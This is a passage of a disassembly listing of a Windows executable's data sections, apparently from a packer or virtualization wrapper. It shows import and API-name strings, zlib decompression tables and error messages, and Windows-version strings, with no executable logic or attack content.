dword_49FA58 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49B361+5�o
dd offset sub_49B480
align 8
dword_49FA68 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49B4AA+5�o
dd offset sub_49B5D5
align 8
dword_49FA78 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49B7DD+5�o
dd offset sub_49B886
align 8
dword_49FA88 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49B8AA+5�o
dd offset sub_49B9C8
align 8
dword_49FA98 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49BB3D+5�o
dd offset sub_49BC33
align 8
dword_49FAA8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49BEAA+5�o
dd offset loc_49BF44
align 8
dword_49FAB8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_49BFC6+5�o
dd offset sub_49C052
align 8
dword_49FAC8 dd 0FFFFFFFFh, 49C0E2h, 49C0E6h, 0FFFFFFFFh, 0 ; DATA XREF: sub_49C076+5�o
dd offset sub_49C15D
dword_49FAE0 dd 0FFFFFFFFh, 49C1C4h, 49C1C8h, 0 ; DATA XREF: sub_49C18D+5�o
dword_49FAF0 dd 0FFFFFFFFh, 0 ; DATA XREF: _4:0049C303�o
dd offset sub_49C3B1
dword_49FAFC dd 0 ; DATA XREF: sub_48DA80+57�o
; sub_48DDBF+52�o
dword_49FB00 dd 2 dup(0) ; DATA XREF: sub_48DA80+36�o
; sub_48DDBF+39�o
dword_49FB08 dd 0FFFFFFFFh, 48DB90h, 48DB94h, 0FFFFFFFFh, 48DC44h, 48DC48h
; DATA XREF: sub_48DA80+5�o
dword_49FB20 dd 0FFFFFFFFh, 48DEB8h, 48DEBCh, 9FB68h, 2 dup(0) ; DATA XREF: sub_48DDBF+5�o
dd 9FCB8h, 9F000h, 9FBB8h, 2 dup(0)
dd 9FCEEh, 9F050h, 5 dup(0)
dd 9FBC4h, 9FBE0h, 9FBF2h, 9FBFEh, 9FC10h, 9FC1Eh, 9FC32h
dd 9FC4Ah, 9FC62h, 9FC76h, 9FC86h, 9FC9Ch, 9FD52h, 9FD42h
dd 9FD32h, 9FCFAh, 9FD06h, 9FD1Ch, 9FD64h, 0
dd 9FCC6h, 9FCD8h, 0
db 19h
db 2, 49h, 6Eh
aItializecrit_0 db 'itializeCriticalSection',0
dd 65470198h, 6F725074h, 64644163h, 73736572h, 2520000h
dd 61636F4Ch, 6572466Ch, 29B0065h, 73696152h, 63784565h
dd 69747065h, 6E6Fh, 6F4C024Eh, 416C6163h, 636F6C6Ch, 1770000h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 2470000h
aLeavecritica_0 db 'LeaveCriticalSection',0
align 2
aP_0 db '',0
aEntercritica_1 db 'EnterCriticalSection',0
align 2
dw 1ADh
aGetshortpathna db 'GetShortPathNameA',0
dw 2C5h
aResumethread db 'ResumeThread',0
align 2
dw 39Dh
aWriteprocessme db 'WriteProcessMemory',0
align 4
db 90h
db 1, 47h, 65h
aTprivateprofil db 'tPrivateProfileSectionA',0
aKernel32_dll_2 db 'KERNEL32.dll',0
align 2
aO_1 db '',0
aDefwindowpro_0 db 'DefWindowProcA',0
align 4
db 2
align 2
aAdjustwindowre db 'AdjustWindowRectEx',0
align 2
aUser32_dll_1 db 'USER32.dll',0
align 2
retf 5202h
; ---------------------------------------------------------------------------
aTlunwind db 'tlUnwind',0
dw 387h
aWidechartomu_1 db 'WideCharToMultiByte',0
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowid_0 db 'ltiByteToWideChar',0
dw 23Ah
aLcmapstringa_0 db 'LCMapStringA',0
align 2
dw 23Bh
aLcmapstringw_0 db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h
db 2 dup(0)
_5 ends
; Section 7. (virtual address 000A0000)
; Virtual size : 00007110 ( 28944.)
; Section size in file : 00007110 ( 28944.)
; Offset to raw data for section: 000A0000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_6 segment para public 'CODE' use32
assume cs:_6
;org 4A0000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
aInvalidBitLeng db 'invalid bit length repeat',0 ; DATA XREF: sub_49CC4B+81D�o
align 4
aTooManyLengthO db 'too many length or distance symbols',0 ; DATA XREF: sub_49CC4B+783�o
aInvalidStoredB db 'invalid stored block lengths',0 ; DATA XREF: sub_49CC4B+6CC�o
align 10h
aInvalidBlockTy db 'invalid block type',0 ; DATA XREF: sub_49CC4B+66B�o
align 4
aInvalidDistanc db 'invalid distance code',0 ; DATA XREF: sub_49D61A+4BB�o
; sub_49DBEB+23E�o
align 4
aInvalidLiteral db 'invalid literal/length code',0 ; DATA XREF: sub_49D61A+486�o
; sub_49DBEB+28D�o
byte_4A00A8 db 31h ; DATA XREF: sub_49DF41+15�r
; sub_49E9F3+2F�o
db 2Eh, 31h, 2Eh
dd 34h
aNeedDictionary db 'need dictionary',0 ; DATA XREF: sub_49E043+307�o
aIncorrectDataC db 'incorrect data check',0 ; DATA XREF: sub_49E043+230�o
align 4
aIncorrectHeade db 'incorrect header check',0 ; DATA XREF: sub_49E043+EC�o
align 10h
aInvalidWindowS db 'invalid window size',0 ; DATA XREF: sub_49E043+9C�o
aUnknownCompres db 'unknown compression method',0 ; DATA XREF: sub_49E043+79�o
align 10h
dword_4A0120 dd 9 ; DATA XREF: sub_49E8AF+6�r
dword_4A0124 dd 5 ; DATA XREF: sub_49E8AF+11�r
dword_4A0128 dd 760h, 100h, 800h, 50h, 800h, 10h, 854h, 73h, 752h, 1Fh
; DATA XREF: sub_49E8AF+1C�o
dd 800h, 70h, 800h, 30h, 900h, 0C0h, 750h, 0Ah, 800h, 60h
dd 800h, 20h, 900h, 0A0h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E0h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 90h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D0h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B0h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F0h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C8h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A8h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E8h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 98h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D8h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B8h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F8h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C4h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A4h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E4h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 94h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D4h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B4h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F4h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CCh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ACh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0ECh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Ch, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DCh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BCh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FCh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C2h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A2h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E2h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 92h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D2h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B2h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F2h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CAh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0AAh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EAh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Ah, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DAh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BAh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FAh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C6h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A6h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E6h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 96h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D6h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B6h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F6h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CEh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AEh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EEh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Eh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DEh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BEh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FEh, 760h, 100h, 800h
dd 50h, 800h, 10h, 854h, 73h, 752h, 1Fh, 800h, 70h, 800h
dd 30h, 900h, 0C1h, 750h, 0Ah, 800h, 60h, 800h, 20h, 900h
dd 0A1h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E1h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 91h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D1h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B1h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F1h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C9h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A9h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E9h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 99h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D9h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B9h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F9h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C5h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A5h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E5h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 95h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D5h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B5h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F5h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CDh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ADh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0EDh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Dh, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DDh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BDh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FDh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C3h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A3h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E3h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 93h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D3h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B3h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F3h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CBh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0ABh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EBh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Bh, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DBh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BBh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FBh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C7h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A7h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E7h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 97h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D7h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B7h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F7h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CFh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AFh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EFh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Fh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DFh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BFh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FFh
dword_4A1128 dd 550h, 1, 557h, 101h, 553h, 11h, 55Bh, 1001h, 551h, 5
; DATA XREF: sub_49E8AF+25�o
dd 559h, 401h, 555h, 41h, 55Dh, 4001h, 550h, 3, 558h, 201h
dd 554h, 21h, 55Ch, 2001h, 552h, 9, 55Ah, 801h, 556h, 81h
dd 5C0h, 6001h, 550h, 2, 557h, 181h, 553h, 19h, 55Bh, 1801h
dd 551h, 7, 559h, 601h, 555h, 61h, 55Dh, 6001h, 550h, 4
dd 558h, 301h, 554h, 31h, 55Ch, 3001h, 552h, 0Dh, 55Ah
dd 0C01h, 556h, 0C1h, 5C0h, 6001h
aIncompleteDyna db 'incomplete dynamic bit lengths tree',0 ; DATA XREF: sub_49E3A6+66�o
aOversubscribed db 'oversubscribed dynamic bit lengths tree',0 ; DATA XREF: sub_49E3A6+4E�o
aIncompleteLite db 'incomplete literal/length tree',0 ; DATA XREF: sub_49E7AC:loc_49E891�o
align 4
aOversubscrib_1 db 'oversubscribed literal/length tree',0 ; DATA XREF: sub_49E7AC+D7�o
align 4
aEmptyDistanceT db 'empty distance tree with lengths',0 ; DATA XREF: sub_49E7AC:loc_49E875�o
align 4
aIncompleteDist db 'incomplete distance tree',0 ; DATA XREF: sub_49E7AC+BB�o
align 4
aOversubscrib_0 db 'oversubscribed distance tree',0 ; DATA XREF: sub_49E7AC+AD�o
align 4
dword_4A1318 dd 0 ; DATA XREF: sub_49CC4B:loc_49D07F�r
; sub_49CC4B+4C0�r ...
dd 1, 3, 7, 0Fh, 1Fh, 3Fh, 7Fh, 0FFh, 1FFh, 3FFh, 7FFh
dd 0FFFh, 1FFFh, 3FFFh, 7FFFh, 0FFFFh
aGetcurrentproc db 'GetCurrentProcess',0 ; DATA XREF: sub_48E2E0+1E4�o
; sub_48F2E0+16B�o
align 10h
aFlushinstructi db 'FlushInstructionCache',0 ; DATA XREF: sub_48E2E0:loc_48E4B0�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_48E2E0+1AB�o
; sub_48EDD0+1D�o ...
align 4
aBarier db 'BARIER',0 ; DATA XREF: sub_48E2E0+4C�o
align 10h
aWindowsntUnkno db 'WindowsNT(unknown)',0 ; DATA XREF: _4:loc_48F1D5�o
; _4:loc_48F1E1�o
align 4
aWindows_net db 'Windows.NET',0 ; DATA XREF: _4:0048F1C9�o
aWindowsxp_0 db 'WindowsXP',0 ; DATA XREF: _4:0048F1B1�o
align 4
aWindows2000 db 'Windows2000',0 ; DATA XREF: _4:0048F199�o
aWindowsnt4_0 db 'WindowsNT(4.0)',0 ; DATA XREF: _4:0048F175�o
align 4
aWindowsnt3_51 db 'WindowsNT(3.51)',0 ; DATA XREF: _4:0048F15A�o
aWindows9xUnkno db 'Windows9x(unknown)',0 ; DATA XREF: _4:loc_48F13F�o
align 4
aWindowsme_0 db 'WindowsMe',0 ; DATA XREF: _4:0048F133�o
align 4
aWindows98_0 db 'Windows98',0 ; DATA XREF: _4:0048F11B�o
align 4
aWindows95_0 db 'Windows95',0 ; DATA XREF: _4:0048F103�o
align 10h
aWin32s db 'win32s',0 ; DATA XREF: _4:loc_48F0E8�o
align 4
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: _4:loc_48EE99�o
; sub_48F2E0+52B�o
align 4
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_48F2E0+86D�o
align 4
aPostmessagea db 'PostMessageA',0 ; DATA XREF: sub_48F2E0+859�o
align 4
aDefwindowproca db 'DefWindowProcA',0 ; DATA XREF: sub_48F2E0+845�o
align 4
aEnumwindows db 'EnumWindows',0 ; DATA XREF: sub_48F2E0+831�o
aDestroywindo_0 db 'DestroyWindow',0 ; DATA XREF: sub_48F2E0+81D�o
align 4
aDispatchmessag db 'DispatchMessageA',0 ; DATA XREF: sub_48F2E0+809�o
align 4
aTranslatemessa db 'TranslateMessage',0 ; DATA XREF: sub_48F2E0+7F5�o
align 4
aGetmessagea db 'GetMessageA',0 ; DATA XREF: sub_48F2E0+7E1�o
aCreatewindowex db 'CreateWindowExA',0 ; DATA XREF: sub_48F2E0+7CD�o
aGetsystemmetri db 'GetSystemMetrics',0 ; DATA XREF: sub_48F2E0+7B9�o
align 4
aRegisterclasse db 'RegisterClassExA',0 ; DATA XREF: sub_48F2E0+7A5�o
align 10h
aSetforegroundw db 'SetForegroundWindow',0 ; DATA XREF: sub_48F2E0+791�o
aSetactivewindo db 'SetActiveWindow',0 ; DATA XREF: sub_48F2E0+77D�o
aGetwindowthrea db 'GetWindowThreadProcessId',0 ; DATA XREF: sub_48F2E0+769�o
align 10h
aBitblt_0 db 'BitBlt',0 ; DATA XREF: sub_48F2E0+755�o
align 4
aDeleteobject_0 db 'DeleteObject',0 ; DATA XREF: sub_48F2E0+741�o
align 4
aSelectobject_0 db 'SelectObject',0 ; DATA XREF: sub_48F2E0+72D�o
align 4
aGetobjecta db 'GetObjectA',0 ; DATA XREF: sub_48F2E0+719�o
align 4
aEndpaint db 'EndPaint',0 ; DATA XREF: sub_48F2E0+705�o
align 10h
aBeginpaint db 'BeginPaint',0 ; DATA XREF: sub_48F2E0+6F1�o
align 4
aRemovefontreso db 'RemoveFontResourceA',0 ; DATA XREF: sub_48F2E0+6DD�o
aDeletedc_0 db 'DeleteDC',0 ; DATA XREF: sub_48F2E0+6C9�o
align 4
aCreatedibsec_0 db 'CreateDIBSection',0 ; DATA XREF: sub_48F2E0+6B5�o
align 10h
aCreatecompat_0 db 'CreateCompatibleDC',0 ; DATA XREF: sub_48F2E0+6A1�o
align 4
aAddfontresourc db 'AddFontResourceA',0 ; DATA XREF: sub_48F2E0:loc_48F96D�o
align 4
aGdi32_dll_0 db 'gdi32.dll',0 ; DATA XREF: sub_48F2E0+668�o
align 4
aWvsprintfa db 'wvsprintfA',0 ; DATA XREF: sub_48F2E0+654�o
align 10h
aWsprintfa db 'wsprintfA',0 ; DATA XREF: sub_48F2E0+640�o
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_48F2E0+62C�o
aLoadimagea db 'LoadImageA',0 ; DATA XREF: sub_48F2E0+618�o
align 4
aCharupperbuffa db 'CharUpperBuffA',0 ; DATA XREF: sub_48F2E0+604�o
align 4
aChangedisplays db 'ChangeDisplaySettingsA',0 ; DATA XREF: sub_48F2E0:loc_48F8D0�o
align 4
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: sub_48F2E0+5CB�o
align 4
aLstrcmpia db 'lstrcmpiA',0 ; DATA XREF: sub_48F2E0+5B7�o
align 4
aWritefile db 'WriteFile',0 ; DATA XREF: sub_48F2E0+5A3�o
; sub_49AF43+153�o
align 10h
aWidechartomult db 'WideCharToMultiByte',0 ; DATA XREF: sub_48F2E0+58F�o
aWaitforsingleo db 'WaitForSingleObject',0 ; DATA XREF: sub_48F2E0+57B�o
; sub_498494+1D4�o
aVirtualquery db 'VirtualQuery',0 ; DATA XREF: sub_48F2E0+567�o
align 4
aVirtualprotect db 'VirtualProtect',0 ; DATA XREF: sub_48F2E0+553�o
align 4
aVirtualfree db 'VirtualFree',0 ; DATA XREF: sub_48F2E0+53F�o
aUnmapviewoffil db 'UnmapViewOfFile',0 ; DATA XREF: sub_48F2E0+517�o
aUnlockfile db 'UnlockFile',0 ; DATA XREF: sub_48F2E0+503�o
align 10h
aTerminateproce db 'TerminateProcess',0 ; DATA XREF: sub_48F2E0+4EF�o
align 4
aSleep db 'Sleep',0 ; DATA XREF: sub_48F2E0+4DB�o
; sub_498494+25E�o
align 4
aSetunhandledex db 'SetUnhandledExceptionFilter',0 ; DATA XREF: sub_48F2E0+4C7�o
aSetlasterror db 'SetLastError',0 ; DATA XREF: sub_48F2E0+4B3�o
align 4
aSetfilepointer db 'SetFilePointer',0 ; DATA XREF: sub_48F2E0+49F�o
align 4
aSetevent db 'SetEvent',0 ; DATA XREF: sub_48F2E0+48B�o
align 4
aSetenvironment db 'SetEnvironmentVariableA',0 ; DATA XREF: sub_48F2E0+477�o
aReadfile db 'ReadFile',0 ; DATA XREF: sub_48F2E0+463�o
align 4
aRaiseexception db 'RaiseException',0 ; DATA XREF: sub_48F2E0+44F�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_48F2E0+43B�o
; sub_498494+230�o
aMultibytetowid db 'MultiByteToWideChar',0 ; DATA XREF: sub_48F2E0+427�o
aMapviewoffile db 'MapViewOfFile',0 ; DATA XREF: sub_48F2E0+413�o
align 4
aLockfile db 'LockFile',0 ; DATA XREF: sub_48F2E0+3FF�o
align 4
aLocalfree db 'LocalFree',0 ; DATA XREF: sub_48F2E0+3EB�o
align 10h
aLocalalloc db 'LocalAlloc',0 ; DATA XREF: sub_48F2E0+3D7�o
align 4
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_48F2E0+3C3�o
align 4
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: sub_48F2E0+3AF�o
align 4
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_48F2E0+39B�o
align 4
aDeletecritical db 'DeleteCriticalSection',0 ; DATA XREF: sub_48F2E0+387�o
align 4
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_48F2E0+373�o
align 4
aHeapcreate db 'HeapCreate',0 ; DATA XREF: sub_48F2E0+35F�o
align 4
aHeapfree db 'HeapFree',0 ; DATA XREF: sub_48F2E0+34B�o
align 10h
aHeapalloc db 'HeapAlloc',0 ; DATA XREF: sub_48F2E0+337�o
align 4
aGettickcount db 'GetTickCount',0 ; DATA XREF: sub_48F2E0+323�o
align 4
aGetversionexa db 'GetVersionExA',0 ; DATA XREF: sub_48F2E0+30F�o
align 4
aGettemppatha db 'GetTempPathA',0 ; DATA XREF: sub_48F2E0+2FB�o
; sub_498494+92�o
align 4
aGettempfilenam db 'GetTempFileNameA',0 ; DATA XREF: sub_48F2E0+2E7�o
align 10h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0 ; DATA XREF: sub_48F2E0+2D3�o
aGetprocaddress db 'GetProcAddress',0 ; DATA XREF: sub_48F2E0+2BF�o
align 4
aGetprivatepr_1 db 'GetPrivateProfileStringA',0 ; DATA XREF: sub_48F2E0+2AB�o
align 4
aGetprivatepr_0 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: sub_48F2E0+297�o
align 4
aGetprivateprof db 'GetPrivateProfileIntA',0 ; DATA XREF: sub_48F2E0+283�o
align 4
aGetmodulehandl db 'GetModuleHandleA',0 ; DATA XREF: sub_48F2E0+26F�o
align 10h
aGetmodulefilen db 'GetModuleFileNameA',0 ; DATA XREF: sub_48F2E0+25B�o
align 4
aGetlasterror db 'GetLastError',0 ; DATA XREF: sub_48F2E0+247�o
align 4
aGetfullpathn_0 db 'GetFullPathNameW',0 ; DATA XREF: sub_48F2E0+233�o
align 4
aGetfullpathnam db 'GetFullPathNameA',0 ; DATA XREF: sub_48F2E0+21F�o
align 4
aGetfiletime db 'GetFileTime',0 ; DATA XREF: sub_48F2E0+20B�o
aGetfilesize db 'GetFileSize',0 ; DATA XREF: sub_48F2E0+1F7�o
aGetfileinforma db 'GetFileInformationByHandle',0 ; DATA XREF: sub_48F2E0+1E3�o
align 10h
aGetfileattri_0 db 'GetFileAttributesW',0 ; DATA XREF: sub_48F2E0+1CF�o
align 4
aGetfileattribu db 'GetFileAttributesA',0 ; DATA XREF: sub_48F2E0+1BB�o
align 4
aGetexitcodepro db 'GetExitCodeProcess',0 ; DATA XREF: sub_48F2E0+1A7�o
; sub_498494+1A6�o
align 4
aGetenvironment db 'GetEnvironmentVariableA',0 ; DATA XREF: sub_48F2E0+193�o
aGetcurrentpr_0 db 'GetCurrentProcessId',0 ; DATA XREF: sub_48F2E0+17F�o
; sub_4968A0+11�o
aFreelibrary db 'FreeLibrary',0 ; DATA XREF: sub_48F2E0+157�o
aFormatmessagea db 'FormatMessageA',0 ; DATA XREF: sub_48F2E0+143�o
align 4
aFlushfilebuffe db 'FlushFileBuffers',0 ; DATA XREF: sub_48F2E0+12F�o
align 4
aFindnextfilea db 'FindNextFileA',0 ; DATA XREF: sub_48F2E0+11B�o
align 4
aFindfirstfilea db 'FindFirstFileA',0 ; DATA XREF: sub_48F2E0+107�o
; sub_498494+11C�o
align 4
aFindclose db 'FindClose',0 ; DATA XREF: sub_48F2E0+F3�o
; sub_498494+178�o
align 4
aExitprocess db 'ExitProcess',0 ; DATA XREF: sub_48F2E0+DF�o
; sub_498494+202�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_48F2E0+CB�o
align 4
aDeletefilea db 'DeleteFileA',0 ; DATA XREF: sub_48F2E0+B7�o
; sub_498494+14A�o
aDebugbreak db 'DebugBreak',0 ; DATA XREF: sub_48F2E0+A3�o
align 10h
aCreateprocessa db 'CreateProcessA',0 ; DATA XREF: sub_48F2E0+8F�o
align 10h
aCreatefilema_0 db 'CreateFileMappingW',0 ; DATA XREF: sub_48F2E0+7B�o
align 4
aCreatefilemapp db 'CreateFileMappingA',0 ; DATA XREF: sub_48F2E0+67�o
align 4
aCreatefilew db 'CreateFileW',0 ; DATA XREF: sub_48F2E0+53�o
aCreatefilea db 'CreateFileA',0 ; DATA XREF: sub_48F2E0+3F�o
aClosehandle db 'CloseHandle',0 ; DATA XREF: sub_48F2E0:loc_48F30B�o
; sub_498494+28C�o
aApiNopefunc db ':API:NopeFunc',0 ; DATA XREF: sub_49EAB0+3�o
align 4
aMbx db 'mbx',0 ; DATA XREF: sub_49094C+19E�o
aBoxReadcompres db ':BOX:ReadCompressedSection: decompresion failed with code %d',0
; DATA XREF: sub_491C5C+340�o
align 10h
a? db '\\?\',0 ; DATA XREF: sub_49253F+56�o
align 4
dword_4A1B68 dd 6Bh ; DATA XREF: sub_493DD0+5A�w
align 10h
dword_4A1B70 dd 2 dup(0) ; DATA XREF: sub_491C5C+B6�o
; sub_491C5C+DB�o ...
dword_4A1B78 dd 0 ; DATA XREF: sub_491C5C+73�r
; sub_491C5C+F9�w ...
dword_4A1B7C dd 0 ; DATA XREF: sub_491C5C+63�r
; sub_491C5C+106�w ...
off_4A1B80 dd offset dword_4A28FC ; DATA XREF: sub_491C5C+84�r
; sub_491C5C+125�r
dd 5 dup(0)
dd offset dword_4A2900
dd 5 dup(0)
dd offset dword_4A2904
align 8
aKernel32_0 db 'kernel32',0 ; DATA XREF: sub_493DD0+E2�o
; sub_49B8AA:loc_49B995�o ...
align 4
aGetlongpathnam db 'GetLongPathNameA',0 ; DATA XREF: sub_493DD0+DD�o
; sub_49BAEB+27�o
align 4
